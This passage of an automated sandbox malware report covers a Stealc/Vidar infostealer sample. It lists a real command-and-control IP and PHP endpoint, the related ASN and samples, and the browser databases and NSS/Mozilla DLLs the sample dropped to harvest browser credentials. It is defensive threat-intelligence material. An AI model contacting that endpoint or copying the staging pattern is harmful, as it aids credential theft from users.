https://support.mozilla.org	JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phppey	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php(	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523481
Start date and time:	2024-10-01 16:49:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	4c469e2cf403fea6249e835ddce23de2.exe	Get hash	malicious	Stealc, Vidar	Browse
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CAAAAFBKFIECAAKECGCAAKJECB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFBFHIEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCBAFIJDGHCAKECAEGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGDBKFBAKFBFHIECFBFIJKJKKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIIIDAKKJJJKKECAKKJEGHCBKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGIECGIEBKJJJJKEGHJJJKEBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKFIDGDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFIJJEGHDAEBGCAKJKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKKEBKJJDGHCBGCAAKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 4c469e2cf403fea6249e835ddce23de2.exe, Detection: malicious, Browse Filename: 6JA2YPtbeB.exe, Detection: malicious, Browse Filename: hTR7xY0d0V.exe, Detection: malicious, Browse Filename: N83LFtMTUS.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
